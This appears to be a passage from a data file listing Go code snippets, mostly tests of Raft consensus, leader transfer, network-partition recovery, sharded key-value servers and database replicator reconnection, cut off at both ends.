{\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tlog.Infof(\"removing node %d\", i)\n\t\tch = cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeRemoveNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n}", "func TestRaftSingleNodeCommit(t *testing.T) {\n\tID1 := \"1\"\n\tclusterPrefix := \"TestRaftSingleNodeCommit\"\n\n\t// Create the Raft node.\n\tfsm := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn := testCreateRaftNode(cfg, newStorage())\n\tn.Start(fsm)\n\tn.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes leader.\n\t<-fsm.leaderCh\n\n\t// Propose 10 commands.\n\tfor i := 0; i < 10; i++ {\n\t\tn.Propose([]byte(\"I'm data-\" + strconv.Itoa(i)))\n\t}\n\n\t// These 10 proposed entries should be applied eventually.\n\tfor i := 0; i < 10; i++ {\n\t\t<-fsm.appliedCh\n\t}\n}", "func TestLeaderAcknowledgeCommit(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tacceptors map[uint64]bool\n\t\twack bool\n\t}{\n\t\t{1, nil, true},\n\t\t{3, nil, false},\n\t\t{3, map[uint64]bool{2: true}, true},\n\t\t{3, map[uint64]bool{2: true, 3: true}, true},\n\t\t{5, nil, false},\n\t\t{5, map[uint64]bool{2: true}, false},\n\t\t{5, map[uint64]bool{2: true, 3: true}, true},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, true},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, true},\n\t}\n\tfor i, tt := range tests {\n\t\ts := NewMemoryStorage()\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, s)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeCandidate()\n\t\tr.becomeLeader()\n\t\tcommitNoopEntry(r, s)\n\t\tli := r.raftLog.lastIndex()\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\t\tfor _, m := range r.readMessages() {\n\t\t\tif tt.acceptors[m.To] {\n\t\t\t\tr.Step(acceptAndReply(m))\n\t\t\t}\n\t\t}\n\n\t\tif g := r.raftLog.committed > li; g != tt.wack {\n\t\t\tt.Errorf(\"#%d: ack commit = %v, want %v\", i, g, tt.wack)\n\t\t}\n\t}\n}", "func TestClient_CreateReplica(t *testing.T) {\n\tc := OpenClient(0)\n\tdefer c.Close()\n\n\t// Create replica through client.\n\tif err := c.CreateReplica(123, &url.URL{Host: \"localhost\"}); err != nil {\n\t\tt.Fatalf(\"unexpected error: %v\", err)\n\t}\n\n\t// Verify replica was created.\n\tif r := c.Server.Handler.Broker().Replica(123); r == nil {\n\t\tt.Fatalf(\"replica not created\")\n\t}\n}", "func (rf *Raft) replicateLog(server, followerNext, leaderLatest, leaderCommit int, successCh chan<- ReplicateState) {\n\t\tvar args AppendEntriesArgs\n\t\tvar reply AppendEntriesReply\n\t\targs.Me = rf.me\n\t\targs.Term = rf.currentTerm\n\t\targs.PrevIndex = followerNext - 1\n\t\targs.PrevTerm = rf.log[args.PrevIndex].Term\n\t\targs.CommitIndex = leaderCommit\n\n\t\t// New log to replicated\n\t\tif leaderLatest >= followerNext {\n\t\t\targs.Logs = rf.log[followerNext : leaderLatest+1]\n\t\t}\n\n\t\t//log.Println(\"Raft \", rf.me, \" replicate log to server \", server, \" \", args)\n\t\tok := rf.sendAppendEntries(server, &args, &reply)\n\t\tstate := ReplicateState{Ok: false, Result: Failed, Server: server}\n\n\t\tif !ok {\n\t\t\tstate.Ok = false\n\n\t\t} else if !reply.Ok && rf.currentTerm >= reply.Term {\n\t\t\tstate.Ok = true\n\t\t\tstate.Result = LogInconsistent\n\t\t\tstate.Term = reply.Term\n\n\t\t} else if !reply.Ok && rf.currentTerm < reply.Term {\n\t\t\t// Follower has high term, do nothing and just wait new leader's heartbeat\n\t\t\tstate.Ok = true\n\t\t\tstate.Result = OldTerm\n\t\t\tstate.Term = reply.Term\n\n\t\t} else {\n\t\t\tstate.Ok = true\n\t\t\tstate.Result = Success\n\t\t\tstate.Term = reply.Term\n\t\t\tstate.LatestIndex = leaderLatest\n\t\t\tstate.Commit = reply.CommitIndex\n\t\t\t//log.Println(\"Rf \", rf.me, \" replicate to \", server, \" success: \", reply)\n\t\t}\n\n\t\tsuccessCh <- state\n}", "func TestPartitionRecovery(t *testing.T) {\n\t<-seq2\n\tconfig := DefaultConfig()\n\tconfig.ClusterSize = 5\n\twaitTime := 500 * time.Millisecond\n\tnodes, err := CreateLocalCluster(config)\n\tif err != nil {\n\t\tError.Printf(\"Error creating nodes: %v\", err)\n\t\treturn\n\t}\n\ttimeDelay := randomTimeout(waitTime)\n\t<-timeDelay\n\tclient, err := Connect(nodes[0].GetRemoteSelf().Addr)\n\tfor err != nil {\n\t\tclient, err = Connect(nodes[0].GetRemoteSelf().Addr)\n\t}\n\ttimeDelay = randomTimeout(waitTime)\n\t<-timeDelay\n\terr = client.SendRequest(hashmachine.HASH_CHAIN_INIT, []byte(strconv.Itoa(123)))\n\tif err != nil {\n\t\tt.Errorf(\"Client request failed\")\n\t}\n\taddRequests := 10\n\tfor i := 0; i < addRequests; i++ {\n\t\terr = client.SendRequest(hashmachine.HASH_CHAIN_ADD, []byte(strconv.Itoa(i)))\n\t\t//wait briefly after requests\n\t\ttimeDelay = randomTimeout(waitTime)\n\t\t<-timeDelay\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Hash Add Command Failed %v\", err)\n\t\t\treturn\n\t\t}\n\t}\n\ttimeDelay = randomTimeout(5 * waitTime)\n\t<-timeDelay\n\t//origLeader will be partitioned with 1 other node and shouldnt commit past index 12\n\torigLeaderIdx := -1\n\tfor idx, node := range nodes {\n\t\tif node.State == LEADER_STATE {\n\t\t\torigLeaderIdx = idx\n\t\t\tbreak\n\t\t}\n\t}\n\t//put origLeader at index 0\n\ttmp := nodes[0]\n\tnodes[0] = nodes[origLeaderIdx]\n\tnodes[origLeaderIdx] = tmp\n\t//now will separate nodes 0 (leader) and 1 from 2,3,4\n\tfor i := 2; i < 5; i++ {\n\t\tnode := nodes[i]\n\t\tnode.NetworkPolicy.RegisterPolicy(*node.GetRemoteSelf(), *nodes[0].GetRemoteSelf(), false)\n\t\tnode.NetworkPolicy.RegisterPolicy(*node.GetRemoteSelf(), *nodes[1].GetRemoteSelf(), false)\n\t\tnode.NetworkPolicy.RegisterPolicy(*nodes[0].GetRemoteSelf(), *node.GetRemoteSelf(), false)\n\t\tnode.NetworkPolicy.RegisterPolicy(*nodes[1].GetRemoteSelf(), *node.GetRemoteSelf(), false)\n\t}\n\tfor i := 0; i < 2; i++ {\n\t\tnode := nodes[i]\n\t\tnode.NetworkPolicy.RegisterPolicy(*node.GetRemoteSelf(), *nodes[2].GetRemoteSelf(), false)\n\t\tnode.NetworkPolicy.RegisterPolicy(*node.GetRemoteSelf(), *nodes[3].GetRemoteSelf(), false)\n\t\tnode.NetworkPolicy.RegisterPolicy(*node.GetRemoteSelf(), *nodes[4].GetRemoteSelf(), false)\n\t\tnode.NetworkPolicy.RegisterPolicy(*nodes[2].GetRemoteSelf(), *node.GetRemoteSelf(), false)\n\t\tnode.NetworkPolicy.RegisterPolicy(*nodes[3].GetRemoteSelf(), *node.GetRemoteSelf(), false)\n\t\tnode.NetworkPolicy.RegisterPolicy(*nodes[4].GetRemoteSelf(), *node.GetRemoteSelf(), false)\n\t}\n\t//while no new leader, continue waiting\n\tnewLeaderIdx := -1\n\tfor newLeaderIdx == -1 {\n\t\ttimeDelay = randomTimeout(5 * waitTime)\n\t\t<-timeDelay\n\t\tfor i := 2; i < 5; i++ {\n\t\t\tif nodes[i].State == LEADER_STATE {\n\t\t\t\tnewLeaderIdx = i\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\t//put origLeader at index 2\n\ttmp = nodes[2]\n\tnodes[2] = nodes[newLeaderIdx]\n\tnodes[newLeaderIdx] = tmp\n\t//have new client attempt to connect to origCluster (should fail and be appended to origCluster)\n\t_, err = Connect(nodes[1].GetRemoteSelf().Addr)\n\tif err == nil {\n\t\tt.Errorf(\"Should Have Failed to connect\")\n\t\treturn\n\t}\n\ttimeDelay = randomTimeout(waitTime)\n\t<-timeDelay\n\t//have new client attempt to connect to newCluster (should work)\n\tnewClient, err := Connect(nodes[4].GetRemoteSelf().Addr)\n\tif err != nil {\n\t\tt.Errorf(\"Should Have connected\")\n\t}\n\ttimeDelay = randomTimeout(waitTime)\n\t<-timeDelay\n\t//perform new add requests\n\taddRequests = 10\n\tfor i := 0; i < addRequests; i++ {\n\t\terr = newClient.SendRequest(hashmachine.HASH_CHAIN_ADD, []byte(strconv.Itoa(i)))\n\t\t//wait briefly after requests\n\t\ttimeDelay = randomTimeout(waitTime)\n\t\t<-timeDelay\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Hash Add Command Failed %v\", err)\n\t\t\treturn\n\t\t}\n\t}\n\ttimeDelay = randomTimeout(10 * waitTime)\n\t<-timeDelay\n\t//verify log entries are in up to index at 23 (1 connect, 10 requests more than before)\n\tfor i := 2; i < 5; i++ {\n\t\tentry := nodes[i].getLogEntry(nodes[i].getLastLogIndex())\n\t\tif entry.Index != 23 || nodes[i].commitIndex != 23 {\n\t\t\tt.Errorf(\"Partitioned nodes failed to handle requests\")\n\t\t\treturn\n\t\t}\n\t}\n\t//also verify commit index at 12 for original Cluster\n\t//note: last entry is 15 cause of client reg request\n\tfor i := 0; i < 2; i++ {\n\t\tentry := nodes[i].getLogEntry(nodes[i].getLastLogIndex())\n\t\tif nodes[i].commitIndex != 12 || entry.Index != 15 {\n\t\t\tt.Errorf(\"Original nodes have bad last log entry\")\n\t\t\treturn\n\t\t}\n\t}\n\t//restore partition and verify all nodes in cluster have same setup (using network policy)\n\tfor i := 2; i < 5; i++ {\n\t\tnode := nodes[i]\n\t\tnode.NetworkPolicy.RegisterPolicy(*node.GetRemoteSelf(), *nodes[0].GetRemoteSelf(), true)\n\t\tnode.NetworkPolicy.RegisterPolicy(*node.GetRemoteSelf(), *nodes[1].GetRemoteSelf(), true)\n\t\tnode.NetworkPolicy.RegisterPolicy(*nodes[0].GetRemoteSelf(), *node.GetRemoteSelf(), true)\n\t\tnode.NetworkPolicy.RegisterPolicy(*nodes[1].GetRemoteSelf(), *node.GetRemoteSelf(), true)\n\t}\n\tfor i := 0; i < 2; i++ {\n\t\tnode := nodes[i]\n\t\tnode.NetworkPolicy.RegisterPolicy(*node.GetRemoteSelf(), *nodes[2].GetRemoteSelf(), true)\n\t\tnode.NetworkPolicy.RegisterPolicy(*node.GetRemoteSelf(), *nodes[3].GetRemoteSelf(), true)\n\t\tnode.NetworkPolicy.RegisterPolicy(*node.GetRemoteSelf(), *nodes[4].GetRemoteSelf(), true)\n\t\tnode.NetworkPolicy.RegisterPolicy(*nodes[2].GetRemoteSelf(), *node.GetRemoteSelf(), true)\n\t\tnode.NetworkPolicy.RegisterPolicy(*nodes[3].GetRemoteSelf(), *node.GetRemoteSelf(), true)\n\t\tnode.NetworkPolicy.RegisterPolicy(*nodes[4].GetRemoteSelf(), *node.GetRemoteSelf(), true)\n\t}\n\ttimeDelay = randomTimeout(10 * waitTime)\n\t<-timeDelay\n\tfor _, node := range nodes {\n\t\tentry := node.getLogEntry(node.getLastLogIndex())\n\t\tif entry.Index != 23 || node.commitIndex != 23 {\n\t\t\tt.Errorf(\"Partitioned failed to be resolved\")\n\t\t\treturn\n\t\t}\n\t}\n\tfor _, node := range nodes {\n\t\tnode.IsShutdown = true\n\t\ttimeDelay = randomTimeout(3 * waitTime)\n\t\t<-timeDelay\n\t}\n\tseq3 <- true\n}", "func StartServer(servers []*labrpc.ClientEnd, me int, persister *raft.Persister, maxraftstate int, gid int, masters []*labrpc.ClientEnd, make_end func(string) *labrpc.ClientEnd) *ShardKV {\n\t// call labgob.Register on structures you want\n\t// Go's RPC library to marshall/unmarshall.\n\tlabgob.Register(Op{})\n\n\t// initialize ShardKV server\n\tkv := new(ShardKV)\n\tkv.me = me\n\n\tkv.make_end = make_end\n\tkv.gid = gid\n\tkv.masters = masters\n\tkv.mck = shardmaster.MakeClerk(kv.masters)\n\n\tkv.applyCh = make(chan raft.ApplyMsg)\n\tkv.rf = raft.Make(servers, me, persister, kv.applyCh)\n\tkv.maxraftstate = maxraftstate\n\tkv.persister = persister\n\tkv.readPersist(persister.ReadSnapshot())\n\tkv.completionCh = make(map[int]chan Op)\n\n\t// keep polling shardmaster for newest configuration\n\tgo func() {\n\t\tfor !kv.killed() {\n\t\t\tconfig := kv.mck.Query(-1)\n\t\t\tkv.mu.Lock()\n\t\t\tkv.config = &config\n\t\t\tkv.mu.Unlock()\n\t\t\ttime.Sleep(100 * time.Millisecond)\n\t\t}\n\t}()\n\n\t// dispatch applyCh messages to RPC handlers\n\tgo func() {\n\t\tfor !kv.killed() {\n\t\t\tapplyMsg := <-kv.applyCh\n\t\t\tkv.mu.Lock()\n\t\t\t// handle InstallSnapshot RPC\n\t\t\tif !applyMsg.CommandValid {\n\t\t\t\tkv.readPersist(applyMsg.Data)\n\t\t\t\t// garbage collect unused channels in completionCh\n\t\t\t\tfor index := range kv.completionCh {\n\t\t\t\t\tif index <= applyMsg.LastIncludedIndex {\n\t\t\t\t\t\tdelete(kv.completionCh, index)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tkv.mu.Unlock()\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\top := applyMsg.Command.(Op)\n\t\t\tindex := applyMsg.CommandIndex\n\n\t\t\tDPrintf(\"[RSM][%v] receive log %v\", kv.me, index)\n\t\t\tif index != kv.lastApplied+1 {\n\t\t\t\tDPrintf(\"[RSM][%v] log index %v, last applied %v\", kv.me, index, kv.lastApplied)\n\t\t\t\tkv.mu.Unlock()\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tlastOp, ok := kv.resps[op.ClerkId]\n\t\t\tif !ok || op.SeqNum > lastOp.SeqNum {\n\t\t\t\tswitch op.OpType {\n\t\t\t\tcase GET:\n\t\t\t\t\top.Value = kv.db[op.Key]\n\t\t\t\t\tDPrintf(\"[KV][%v] Get(%v)@%v\", kv.me, op.Key, index)\n\t\t\t\tcase PUT:\n\t\t\t\t\tkv.db[op.Key] = op.Value\n\t\t\t\t\tDPrintf(\"[KV][%v] Put(%v, %v)@%v\", kv.me, op.Key, op.Value, index)\n\t\t\t\tcase APPEND:\n\t\t\t\t\tkv.db[op.Key] = kv.db[op.Key] + op.Value\n\t\t\t\t\tDPrintf(\"[KV][%v] Append(%v, %v)@%v\", kv.me, op.Key, op.Value, index)\n\t\t\t\t}\n\t\t\t\tkv.resps[op.ClerkId] = op\n\t\t\t\t// notify the completion channel\n\t\t\t\tch, ok := kv.completionCh[index]\n\t\t\t\tkv.lastApplied++\n\n\t\t\t\tkv.mu.Unlock()\n\t\t\t\tif ok {\n\t\t\t\t\t// TODO can have deadlock here...\n\t\t\t\t\tch <- op\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tswitch op.OpType {\n\t\t\t\tcase GET:\n\t\t\t\t\tDPrintf(\"[RSM][%v] duplicate log %v, Get(%v), %v\", kv.me, index, op.Key, op)\n\t\t\t\tcase PUT:\n\t\t\t\t\tDPrintf(\"[RSM][%v] duplicate log %v, Put(%v, %v), %v\", kv.me, index, op.Key, op.Value, op)\n\t\t\t\tcase APPEND:\n\t\t\t\t\tDPrintf(\"[RSM][%v] duplicate log %v, Append(%v, %v), %v\", kv.me, index, op.Key, op.Value, op)\n\t\t\t\t}\n\t\t\t\tkv.lastApplied += 1\n\t\t\t\tkv.mu.Unlock()\n\t\t\t}\n\n\t\t\t// check if a log compaction is necessary\n\t\t\tif kv.maxraftstate == -1 {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif kv.persister.RaftStateSize() >= kv.maxraftstate {\n\t\t\t\tw := new(bytes.Buffer)\n\t\t\t\te := labgob.NewEncoder(w)\n\t\t\t\t_ = e.Encode(kv.db)\n\t\t\t\t_ = e.Encode(kv.resps)\n\t\t\t\t_ = e.Encode(kv.lastApplied)\n\t\t\t\tsnapshot := w.Bytes()\n\t\t\t\tgo kv.rf.Snapshot(snapshot, index)\n\t\t\t}\n\t\t}\n\t}()\n\treturn kv\n}", "func TestActiveReplicatorReconnectOnStart(t *testing.T) {\n\tbase.RequireNumTestBuckets(t, 2)\n\n\tif testing.Short() {\n\t\tt.Skipf(\"Test skipped in short mode\")\n\t}\n\n\ttests := []struct {\n\t\tname string\n\t\tusernameOverride string\n\t\tremoteURLHostOverride string\n\t\texpectedErrorContains string\n\t\texpectedErrorIsConnectionRefused bool\n\t}{\n\t\t{\n\t\t\tname: \"wrong user\",\n\t\t\tusernameOverride: \"bob\",\n\t\t\texpectedErrorContains: \"unexpected status code 401 from target database\",\n\t\t},\n\t\t{\n\t\t\tname: \"invalid port\", // fails faster than unroutable address (connection refused vs. connect timeout)\n\t\t\tremoteURLHostOverride: \"127.0.0.1:1234\",\n\t\t\texpectedErrorIsConnectionRefused: true,\n\t\t},\n\t}\n\tfor _, test := range tests {\n\t\tt.Run(test.name, func(t *testing.T) {\n\n\t\t\tvar abortTimeout = time.Millisecond * 500\n\t\t\tif runtime.GOOS == \"windows\" {\n\t\t\t\t// A longer timeout is required on Windows as connection refused errors take approx 2 seconds vs. instantaneous on Linux.\n\t\t\t\tabortTimeout = time.Second * 5\n\t\t\t}\n\t\t\t// test cases with and without a timeout. Ensure replicator retry loop is stopped in both cases.\n\t\t\ttimeoutVals := []time.Duration{\n\t\t\t\t0,\n\t\t\t\tabortTimeout,\n\t\t\t}\n\n\t\t\tfor _, timeoutVal := range timeoutVals {\n\t\t\t\tt.Run(test.name+\" with timeout \"+timeoutVal.String(), func(t *testing.T) {\n\n\t\t\t\t\tbase.SetUpTestLogging(t, logger.LevelDebug, logger.KeyAll)\n\n\t\t\t\t\t// Passive\n\t\t\t\t\ttb2 := base.GetTestBucket(t)\n\t\t\t\t\trt2 := NewRestTester(t, &RestTesterConfig{\n\t\t\t\t\t\tTestBucket: tb2,\n\t\t\t\t\t\tDatabaseConfig: &DatabaseConfig{DbConfig: DbConfig{\n\t\t\t\t\t\t\tUsers: map[string]*db.PrincipalConfig{\n\t\t\t\t\t\t\t\t\"alice\": {\n\t\t\t\t\t\t\t\t\tPassword: base.StringPtr(\"pass\"),\n\t\t\t\t\t\t\t\t\tExplicitChannels: utils.SetOf(\"alice\"),\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t}},\n\t\t\t\t\t})\n\t\t\t\t\tdefer rt2.Close()\n\n\t\t\t\t\t// Make rt2 listen on an actual HTTP port, so it can receive the blipsync request from rt1\n\t\t\t\t\tsrv := httptest.NewServer(rt2.TestPublicHandler())\n\t\t\t\t\tdefer srv.Close()\n\n\t\t\t\t\t// Build remoteDBURL with basic auth creds\n\t\t\t\t\tremoteDBURL, err := url.Parse(srv.URL + \"/db\")\n\t\t\t\t\trequire.NoError(t, err)\n\n\t\t\t\t\t// Add basic auth creds to target db URL\n\t\t\t\t\tusername := \"alice\"\n\t\t\t\t\tif test.usernameOverride != \"\" {\n\t\t\t\t\t\tusername = test.usernameOverride\n\t\t\t\t\t}\n\t\t\t\t\tremoteDBURL.User = url.UserPassword(username, \"pass\")\n\n\t\t\t\t\tif test.remoteURLHostOverride != \"\" {\n\t\t\t\t\t\tremoteDBURL.Host = test.remoteURLHostOverride\n\t\t\t\t\t}\n\n\t\t\t\t\t// Active\n\t\t\t\t\ttb1 := base.GetTestBucket(t)\n\t\t\t\t\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\t\t\t\t\tTestBucket: tb1,\n\t\t\t\t\t})\n\t\t\t\t\tdefer rt1.Close()\n\n\t\t\t\t\tid, err := base.GenerateRandomID()\n\t\t\t\t\trequire.NoError(t, err)\n\t\t\t\t\tarConfig := db.ActiveReplicatorConfig{\n\t\t\t\t\t\tID: id,\n\t\t\t\t\t\tDirection: db.ActiveReplicatorTypePush,\n\t\t\t\t\t\tRemoteDBURL: remoteDBURL,\n\t\t\t\t\t\tActiveDB: &db.Database{\n\t\t\t\t\t\t\tDatabaseContext: rt1.GetDatabase(),\n\t\t\t\t\t\t},\n\t\t\t\t\t\tContinuous: true,\n\t\t\t\t\t\t// aggressive reconnect intervals for testing purposes\n\t\t\t\t\t\tInitialReconnectInterval: time.Millisecond,\n\t\t\t\t\t\tMaxReconnectInterval: time.Millisecond * 50,\n\t\t\t\t\t\tTotalReconnectTimeout: timeoutVal,\n\t\t\t\t\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t\t\t\t\t}\n\n\t\t\t\t\t// Create the first active replicator to pull from seq:0\n\t\t\t\t\tar := db.NewActiveReplicator(&arConfig)\n\t\t\t\t\trequire.NoError(t, err)\n\n\t\t\t\t\tassert.Equal(t, int64(0), ar.Push.GetStats().NumConnectAttempts.Value())\n\n\t\t\t\t\terr = ar.Start()\n\t\t\t\t\tassert.Error(t, err, \"expecting ar.Start() to return error, but it didn't\")\n\n\t\t\t\t\tif test.expectedErrorIsConnectionRefused {\n\t\t\t\t\t\tassert.True(t, base.IsConnectionRefusedError(err))\n\t\t\t\t\t}\n\n\t\t\t\t\tif test.expectedErrorContains != \"\" {\n\t\t\t\t\t\tassert.True(t, strings.Contains(err.Error(), test.expectedErrorContains))\n\t\t\t\t\t}\n\n\t\t\t\t\t// wait for an arbitrary number of reconnect attempts\n\t\t\t\t\twaitAndRequireCondition(t, func() bool {\n\t\t\t\t\t\treturn ar.Push.GetStats().NumConnectAttempts.Value() > 2\n\t\t\t\t\t}, \"Expecting NumConnectAttempts > 2\")\n\n\t\t\t\t\tif timeoutVal > 0 {\n\t\t\t\t\t\ttime.Sleep(timeoutVal + time.Millisecond*250)\n\t\t\t\t\t\t// wait for the retry loop to hit the TotalReconnectTimeout and give up retrying\n\t\t\t\t\t\twaitAndRequireCondition(t, func() bool {\n\t\t\t\t\t\t\treturn ar.Push.GetStats().NumReconnectsAborted.Value() > 0\n\t\t\t\t\t\t}, \"Expecting NumReconnectsAborted > 0\")\n\t\t\t\t\t}\n\n\t\t\t\t\tassert.NoError(t, ar.Stop())\n\t\t\t\t})\n\t\t\t}\n\t\t})\n\t}\n}", "func TestLeaderTransferToUpToDateNode(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func TestStatsConnTopoNewLeaderParticipation(t *testing.T) {\n\tconn := &fakeConn{}\n\tstatsConn := NewStatsConn(\"global\", conn)\n\n\t_, _ = statsConn.NewLeaderParticipation(\"\", \"\")\n\ttimingCounts := topoStatsConnTimings.Counts()[\"NewLeaderParticipation.global\"]\n\tif got, want := timingCounts, int64(1); got != want {\n\t\tt.Errorf(\"stats were not properly recorded: got = %d, want = %d\", got, want)\n\t}\n\n\t// error is zero before getting an error\n\terrorCount := topoStatsConnErrors.Counts()[\"NewLeaderParticipation.global\"]\n\tif got, want := errorCount, int64(0); got != want {\n\t\tt.Errorf(\"stats were not properly recorded: got = %d, want = %d\", got, want)\n\t}\n\n\t_, _ = statsConn.NewLeaderParticipation(\"error\", \"\")\n\n\t// error stats gets emitted\n\terrorCount = topoStatsConnErrors.Counts()[\"NewLeaderParticipation.global\"]\n\tif got, want := errorCount, int64(1); got != want {\n\t\tt.Errorf(\"stats were not properly recorded: got = %d, want = %d\", got, want)\n\t}\n}", "func TestActiveReplicatorRecoverFromLocalFlush(t *testing.T) {\n\n\tbase.RequireNumTestBuckets(t, 3)\n\n\tbase.SetUpTestLogging(t, logger.LevelInfo, logger.KeyReplicate, logger.KeyHTTP, logger.KeyHTTPResp, logger.KeySync, logger.KeySyncMsg)\n\n\t// Passive\n\trt2 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: base.GetTestBucket(t),\n\t\tDatabaseConfig: &DatabaseConfig{DbConfig: DbConfig{\n\t\t\tUsers: map[string]*db.PrincipalConfig{\n\t\t\t\t\"alice\": {\n\t\t\t\t\tPassword: base.StringPtr(\"pass\"),\n\t\t\t\t\tExplicitChannels: utils.SetOf(\"alice\"),\n\t\t\t\t},\n\t\t\t},\n\t\t}},\n\t})\n\tdefer rt2.Close()\n\n\t// Create doc on rt2\n\tdocID := t.Name() + \"rt2doc\"\n\tresp := rt2.SendAdminRequest(http.MethodPut, \"/db/\"+docID, `{\"source\":\"rt2\",\"channels\":[\"alice\"]}`)\n\tassertStatus(t, resp, http.StatusCreated)\n\n\tassert.NoError(t, rt2.WaitForPendingChanges())\n\n\t// Make rt2 listen on an actual HTTP port, so it can receive the blipsync request from rt1\n\tsrv := httptest.NewServer(rt2.TestPublicHandler())\n\tdefer srv.Close()\n\n\t// Build passiveDBURL with basic auth creds\n\tpassiveDBURL, err := url.Parse(srv.URL + \"/db\")\n\trequire.NoError(t, err)\n\tpassiveDBURL.User = url.UserPassword(\"alice\", \"pass\")\n\n\t// Active\n\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: base.GetTestBucket(t),\n\t})\n\n\tarConfig := db.ActiveReplicatorConfig{\n\t\tID: t.Name(),\n\t\tDirection: db.ActiveReplicatorTypePull,\n\t\tRemoteDBURL: passiveDBURL,\n\t\tActiveDB: &db.Database{\n\t\t\tDatabaseContext: rt1.GetDatabase(),\n\t\t},\n\t\tContinuous: true,\n\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t}\n\n\t// Create the first active replicator to pull from seq:0\n\tar := db.NewActiveReplicator(&arConfig)\n\trequire.NoError(t, err)\n\n\tstartNumChangesRequestedFromZeroTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tstartNumRevsSentTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().RevSendCount.Value()\n\n\tassert.NoError(t, ar.Start())\n\n\t// wait for document originally written to rt2 to arrive at rt1\n\tchangesResults, err := rt1.WaitForChanges(1, \"/db/_changes?since=0\", \"\", true)\n\trequire.NoError(t, err)\n\trequire.Len(t, changesResults.Results, 1)\n\tassert.Equal(t, docID, changesResults.Results[0].ID)\n\n\tdoc, err := rt1.GetDatabase().GetDocument(logger.TestCtx(t), docID, db.DocUnmarshalAll)\n\tassert.NoError(t, err)\n\n\tbody, err := doc.GetDeepMutableBody()\n\trequire.NoError(t, err)\n\tassert.Equal(t, \"rt2\", body[\"source\"])\n\n\t// one _changes from seq:0 with initial number of docs sent\n\tnumChangesRequestedFromZeroTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tassert.Equal(t, startNumChangesRequestedFromZeroTotal+1, numChangesRequestedFromZeroTotal)\n\n\t// rev assertions\n\tnumRevsSentTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().RevSendCount.Value()\n\tassert.Equal(t, startNumRevsSentTotal+1, numRevsSentTotal)\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().ProcessedSequenceCount)\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().ExpectedSequenceCount)\n\n\t// checkpoint assertions\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().GetCheckpointMissCount)\n\t// Since we bumped the checkpointer interval, we're only setting checkpoints on replicator close.\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\tar.Pull.Checkpointer.CheckpointNow()\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\n\tassert.NoError(t, ar.Stop())\n\n\t// close rt1, and release the underlying bucket back to the pool.\n\trt1.Close()\n\n\t// recreate rt1 with a new bucket\n\trt1 = NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: base.GetTestBucket(t),\n\t})\n\tdefer rt1.Close()\n\n\t// Create a new replicator using the same config, which should use the checkpoint set from the first.\n\t// Have to re-set ActiveDB because we recreated it with the new rt1.\n\tarConfig.ActiveDB = &db.Database{\n\t\tDatabaseContext: rt1.GetDatabase(),\n\t}\n\tar = db.NewActiveReplicator(&arConfig)\n\trequire.NoError(t, err)\n\n\tassert.NoError(t, ar.Start())\n\n\t// we pulled the remote checkpoint, but the local checkpoint wasn't there to match it.\n\tassert.Equal(t, int64(0), 